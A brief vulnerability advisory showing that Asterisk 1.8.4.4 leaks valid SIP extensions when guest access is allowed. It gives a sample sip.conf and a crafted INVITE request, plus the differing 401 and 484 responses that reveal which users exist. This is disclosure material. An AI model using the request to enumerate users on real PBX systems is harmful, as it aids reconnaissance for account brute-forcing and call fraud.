Asterisk 1.8.4.4, sip response permit username identification through use INVITE 

Author: francesco.tornieri \"At\" verona-wireless.net 
Summary: Sip responses permit user identification
Reference: http://downloads.asterisk.org/pub/security/AST-2011-011.pdf
Release Date: 30/06/2011
Criticality level: Low
Impact: Information leak
Software: Asterisk 1.8.4.4

Description:
In the last release (1.8.4.4) the Digium's developers have added a patch to mitigate extensions enumeration but it's still possible to enumerate it through use of craft INVITE method (it's only work if "allowguest=yes").

Example:
PBX Asterisk:
----------
sip.conf
----------
[general]
context=outgoing
port=5060
bindaddr=127.0.0.1
realm=asterisk
allowguest=yes	 		<----	
alwaysauthreject=yes		<----

[template](!)
type=friend
canreinvite=no
host=dynamic
qualify=1000
disallow=all
allow=g729

[500](template)
callerid=phone200<500>
username=500
secret=password

------------------------
Craft Sip INVITE example
------------------------
INVITE sip:500@127.0.0.1 SIP/2.0
CSeq: 123 INVITE
Via: SIP/2.0/UDP 127.0.0.1:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport
From: <sip:500@127.0.0.1>;tag=642d29cd-0671-e011-81a1-a1816009ca7a
Call-ID: 571579d6e5814dff04ac7cd42672738f
To: <sip:500@127.0.0.1>

----------------
Method: REGISTER 
----------------
Valid user (user 500)
Response: 
---
SIP/2.0 401 Unauthorized
---

Invalid user (user 501)
Response:
---
SIP/2.0 484 Address Incomplete
---

Francesco Tornieri